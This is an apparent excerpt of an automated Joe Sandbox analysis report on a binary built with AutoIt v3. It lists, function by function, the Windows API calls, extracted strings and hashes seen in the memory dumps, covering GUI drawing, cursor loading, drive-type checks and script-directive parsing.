                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                • API String ID: 2910397461-517079104
                                • Opcode ID: 3559e6863deace7beab74f6894301383445492b3c377bd3c384d1702710d6bb9
                                • Instruction ID: 719050b46108d4b39f0a7e4fbfe85e2eaee2d1cd9808bb907c2c8dfbc7bd9ddd
                                • Opcode Fuzzy Hash: 3559e6863deace7beab74f6894301383445492b3c377bd3c384d1702710d6bb9
                                • Instruction Fuzzy Hash: 55A17171A40219BFEB149F65DD4AFAF7BB9EB48710F004254FA14A71E0CBB4AD41CB60
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00B0AF89
                                • GetDriveTypeW.KERNEL32(?,00B2FAC0,?,\\.\,00B2F910), ref: 00B0B066
                                • SetErrorMode.KERNEL32(00000000,00B2FAC0,?,\\.\,00B2F910), ref: 00B0B1C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorMode$DriveType
                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                • API String ID: 2907320926-4222207086
                                • Opcode ID: 9957801860f42a7753b2a36f689af3d797adfca71a44e19842d228847d678a7d
                                • Instruction ID: 6a760136c96ae836b49347bbf82571f549929a186e13fc912306b9c2e86b4e07
                                • Opcode Fuzzy Hash: 9957801860f42a7753b2a36f689af3d797adfca71a44e19842d228847d678a7d
                                • Instruction Fuzzy Hash: 0551A530694305ABCB14DB10CEA2E7D7BF1EF1A782B2041D5E81AB72E0DB759D45DB42
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                • API String ID: 1038674560-86951937
                                • Opcode ID: 0d620d78f01233ca395ccf054a70a4aa7c50a2b0299bf57cee24ae8cea532546
                                • Instruction ID: ea5539e2ae577975cff7ef535bf24eaade9100014cbaa5fa7f7f92a6f74ee664
                                • Opcode Fuzzy Hash: 0d620d78f01233ca395ccf054a70a4aa7c50a2b0299bf57cee24ae8cea532546
                                • Instruction Fuzzy Hash: BF812A71640215BBCF21BB60CE82FBF77A8AF12740F088025FD46AF1D2EB61DA51C661
                                APIs
                                • GetSysColor.USER32(00000012), ref: 00B2AB99
                                • SetTextColor.GDI32(?,?), ref: 00B2AB9D
                                • GetSysColorBrush.USER32(0000000F), ref: 00B2ABB3
                                • GetSysColor.USER32(0000000F), ref: 00B2ABBE
                                • CreateSolidBrush.GDI32(?), ref: 00B2ABC3
                                • GetSysColor.USER32(00000011), ref: 00B2ABDB
                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2ABE9
                                • SelectObject.GDI32(?,00000000), ref: 00B2ABFA
                                • SetBkColor.GDI32(?,00000000), ref: 00B2AC03
                                • SelectObject.GDI32(?,?), ref: 00B2AC10
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00B2AC2F
                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2AC46
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00B2AC5B
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B2ACA7
                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B2ACCE
                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00B2ACEC
                                • DrawFocusRect.USER32(?,?), ref: 00B2ACF7
                                • GetSysColor.USER32(00000011), ref: 00B2AD05
                                • SetTextColor.GDI32(?,00000000), ref: 00B2AD0D
                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B2AD21
                                • SelectObject.GDI32(?,00B2A869), ref: 00B2AD38
                                • DeleteObject.GDI32(?), ref: 00B2AD43
                                • SelectObject.GDI32(?,?), ref: 00B2AD49
                                • DeleteObject.GDI32(?), ref: 00B2AD4E
                                • SetTextColor.GDI32(?,?), ref: 00B2AD54
                                • SetBkColor.GDI32(?,?), ref: 00B2AD5E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                • String ID:
                                • API String ID: 1996641542-0
                                • Opcode ID: 5948135816ea9c4a00f1073e40d14a00ea6c85f0d45e5048547f91621a9bef24
                                • Instruction ID: c6f5e541e81c428dc3b010ff552c1e1c770bd549c94ced944ffacc1f262cdeef
                                • Opcode Fuzzy Hash: 5948135816ea9c4a00f1073e40d14a00ea6c85f0d45e5048547f91621a9bef24
                                • Instruction Fuzzy Hash: 5B617D71900219EFDF219FA4DC48EAEBBB9EB08720F104165F915AB2A1DA759D41CF90
                                APIs
                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B28D34
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B28D45
                                • CharNextW.USER32(0000014E), ref: 00B28D74
                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B28DB5
                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B28DCB
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B28DDC
                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B28DF9
                                • SetWindowTextW.USER32(?,0000014E), ref: 00B28E45
                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B28E5B
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B28E8C
                                • _memset.LIBCMT ref: 00B28EB1
                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B28EFA
                                • _memset.LIBCMT ref: 00B28F59
                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00B28F83
                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B28FDB
                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00B29088
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00B290AA
                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B290F4
                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B29121
                                • DrawMenuBar.USER32(?), ref: 00B29130
                                • SetWindowTextW.USER32(?,0000014E), ref: 00B29158
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                • String ID: 0
                                • API String ID: 1073566785-4108050209
                                • Opcode ID: 125877fa953059fec1e1edf6ffff149e00ac77f8613ea33f8da7e1bf0feb3c52
                                • Instruction ID: 026e06c94d49b94638432b5a66709253f450611515c2e005902133c7db7d015e
                                • Opcode Fuzzy Hash: 125877fa953059fec1e1edf6ffff149e00ac77f8613ea33f8da7e1bf0feb3c52
                                • Instruction Fuzzy Hash: D0E19370901229ABDF219F51DC84EFE7BB9EF05710F1081A9F91DAB290DB748A85DF60
                                APIs
                                • GetCursorPos.USER32(?), ref: 00B24C51
                                • GetDesktopWindow.USER32 ref: 00B24C66
                                • GetWindowRect.USER32(00000000), ref: 00B24C6D
                                • GetWindowLongW.USER32(?,000000F0), ref: 00B24CCF
                                • DestroyWindow.USER32(?), ref: 00B24CFB
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B24D24
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B24D42
                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B24D68
                                • SendMessageW.USER32(?,00000421,?,?), ref: 00B24D7D
                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B24D90
                                • IsWindowVisible.USER32(?), ref: 00B24DB0
                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B24DCB
                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B24DDF
                                • GetWindowRect.USER32(?,?), ref: 00B24DF7
                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00B24E1D
                                • GetMonitorInfoW.USER32(00000000,?), ref: 00B24E37
                                • CopyRect.USER32(?,?), ref: 00B24E4E
                                • SendMessageW.USER32(?,00000412,00000000), ref: 00B24EB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                • String ID: ($0$tooltips_class32
                                • API String ID: 698492251-4156429822
                                • Opcode ID: 48f1b750163ddf584a348be63d9cf847d6894b9b43ce6f45ec6978d7539b85b0
                                • Instruction ID: 625d613d88aa069aef5f077a60ec8cc1118a9e8c9dade33ee16961883d9858a3
                                • Opcode Fuzzy Hash: 48f1b750163ddf584a348be63d9cf847d6894b9b43ce6f45ec6978d7539b85b0
                                • Instruction Fuzzy Hash: A9B17771604311AFDB14DF24D988B6ABBE4FF89710F00896CF5999B2A1DB71EC05CB91
                                APIs
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA28BC
                                • GetSystemMetrics.USER32(00000007), ref: 00AA28C4
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AA28EF
                                • GetSystemMetrics.USER32(00000008), ref: 00AA28F7
                                • GetSystemMetrics.USER32(00000004), ref: 00AA291C
                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AA2939
                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AA2949
                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AA297C
                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AA2990
                                • GetClientRect.USER32(00000000,000000FF), ref: 00AA29AE
                                • GetStockObject.GDI32(00000011), ref: 00AA29CA
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA29D5
                                  • Part of subcall function 00AA2344: GetCursorPos.USER32(?), ref: 00AA2357
                                  • Part of subcall function 00AA2344: ScreenToClient.USER32(00B667B0,?), ref: 00AA2374
                                  • Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000001), ref: 00AA2399
                                  • Part of subcall function 00AA2344: GetAsyncKeyState.USER32(00000002), ref: 00AA23A7
                                • SetTimer.USER32(00000000,00000000,00000028,00AA1256), ref: 00AA29FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                • String ID: AutoIt v3 GUI
                                • API String ID: 1458621304-248962490
                                • Opcode ID: d78ba7aed9b82778a245f2eb466b50f0901ae824770ac56577cdf640d6268bad
                                • Instruction ID: f1c0ea434ffa46883a7617a61507d9cade2692d9b10041da9943dc360f89cd6c
                                • Opcode Fuzzy Hash: d78ba7aed9b82778a245f2eb466b50f0901ae824770ac56577cdf640d6268bad
                                • Instruction Fuzzy Hash: A6B13E71A0020AEFDB14DFA8DD45BAE7BB5FB08715F104129FA16A72E0DB749851CB50
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 00B240F6
                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B241B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: BuffCharMessageSendUpper
                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                • API String ID: 3974292440-719923060
                                • Opcode ID: ad98dad4657e11ebba4848cf9ffdcbe6596745175eceeb169a8a0e658ca69f63
                                • Instruction ID: 56fc28bc9ecf108d9f3b320a1979e0ce4ed72699965608ae7f241f55ecc99133
                                • Opcode Fuzzy Hash: ad98dad4657e11ebba4848cf9ffdcbe6596745175eceeb169a8a0e658ca69f63
                                • Instruction Fuzzy Hash: 4CA19F30214215DFCB14EF20DA91F6AB7E5EF85314F1049ACB89A9B6D2DB31ED0ACB51
                                APIs
                                • LoadCursorW.USER32(00000000,00007F89), ref: 00B15309
                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00B15314
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00B1531F
                                • LoadCursorW.USER32(00000000,00007F03), ref: 00B1532A
                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00B15335
                                • LoadCursorW.USER32(00000000,00007F01), ref: 00B15340
                                • LoadCursorW.USER32(00000000,00007F81), ref: 00B1534B
                                • LoadCursorW.USER32(00000000,00007F88), ref: 00B15356
                                • LoadCursorW.USER32(00000000,00007F80), ref: 00B15361
                                • LoadCursorW.USER32(00000000,00007F86), ref: 00B1536C
                                • LoadCursorW.USER32(00000000,00007F83), ref: 00B15377
                                • LoadCursorW.USER32(00000000,00007F85), ref: 00B15382
                                • LoadCursorW.USER32(00000000,00007F82), ref: 00B1538D
                                • LoadCursorW.USER32(00000000,00007F84), ref: 00B15398
                                • LoadCursorW.USER32(00000000,00007F04), ref: 00B153A3
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00B153AE
                                • GetCursorInfo.USER32(?), ref: 00B153BE
                                • GetLastError.KERNEL32(00000001,00000000), ref: 00B153E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Cursor$Load$ErrorInfoLast
                                • String ID:
                                • API String ID: 3215588206-0
                                • Opcode ID: c5e21a553b38dfe912ff9c7ea19a05b0225090073dc4c07ec5a9a1846fb70088
                                • Instruction ID: 0abdbe17069132e9b8935d29fbfc532e1a8d9650f074e146511ea8fc3f9a423f
                                • Opcode Fuzzy Hash: c5e21a553b38dfe912ff9c7ea19a05b0225090073dc4c07ec5a9a1846fb70088
                                • Instruction Fuzzy Hash: 09417670E04319AADB209FB68C498AFFFF8EF51B50B10452FA519E7290DAB85441CE51
                                APIs
                                • GetClassNameW.USER32(?,?,00000100), ref: 00AFAAA5
                                • __swprintf.LIBCMT ref: 00AFAB46
                                • _wcscmp.LIBCMT ref: 00AFAB59
                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AFABAE
                                • _wcscmp.LIBCMT ref: 00AFABEA
                                • GetClassNameW.USER32(?,?,00000400), ref: 00AFAC21
                                • GetDlgCtrlID.USER32(?), ref: 00AFAC73
                                • GetWindowRect.USER32(?,?), ref: 00AFACA9
                                • GetParent.USER32(?), ref: 00AFACC7
                                • ScreenToClient.USER32(00000000), ref: 00AFACCE
                                • GetClassNameW.USER32(?,?,00000100), ref: 00AFAD48
                                • _wcscmp.LIBCMT ref: 00AFAD5C
                                • GetWindowTextW.USER32(?,?,00000400), ref: 00AFAD82
                                • _wcscmp.LIBCMT ref: 00AFAD96
                                  • Part of subcall function 00AC386C: _iswctype.LIBCMT ref: 00AC3874
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                • String ID: %s%u
                                • API String ID: 3744389584-679674701
                                • Opcode ID: 5e9efb86099a7caa98339e89dd269c8aa4e2eff27bc86a73d5135bd8d60142cc
                                • Instruction ID: abfa65c202a6382f188402125fecc495e0392a1819e0dbcc33f4c351e1350c84
                                • Opcode Fuzzy Hash: 5e9efb86099a7caa98339e89dd269c8aa4e2eff27bc86a73d5135bd8d60142cc
                                • Instruction Fuzzy Hash: 95A1B1B120420AAFD715DFA4C884BFAB7E8FF14355F008529FA9DD2150DB30E945CB92
                                APIs
                                • GetClassNameW.USER32(00000008,?,00000400), ref: 00AFB3DB
                                • _wcscmp.LIBCMT ref: 00AFB3EC
                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 00AFB414
                                • CharUpperBuffW.USER32(?,00000000), ref: 00AFB431
                                • _wcscmp.LIBCMT ref: 00AFB44F
                                • _wcsstr.LIBCMT ref: 00AFB460
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00AFB498
                                • _wcscmp.LIBCMT ref: 00AFB4A8
                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 00AFB4CF
                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00AFB518
                                • _wcscmp.LIBCMT ref: 00AFB528
                                • GetClassNameW.USER32(00000010,?,00000400), ref: 00AFB550
                                • GetWindowRect.USER32(00000004,?), ref: 00AFB5B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                • String ID: @$ThumbnailClass
                                • API String ID: 1788623398-1539354611
                                • Opcode ID: 6e52d773cb330fd5ef2692e40279600dec2cab949df1808c7cf4a68a12cfa5ce
                                • Instruction ID: 15dc6019e6621c5f8dd1677d3f623906af98192a4bf9b615c992459af13cc176
                                • Opcode Fuzzy Hash: 6e52d773cb330fd5ef2692e40279600dec2cab949df1808c7cf4a68a12cfa5ce
                                • Instruction Fuzzy Hash: 9481AE7101820A9BDB15DF90C985FBABBF8EF44314F088569FE859A0A2DB34DD45CBA1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                • API String ID: 1038674560-1810252412
                                • Opcode ID: 04500752a16081e9b86bab5296e659ce9f9861eed485a7acb270528035f6e187
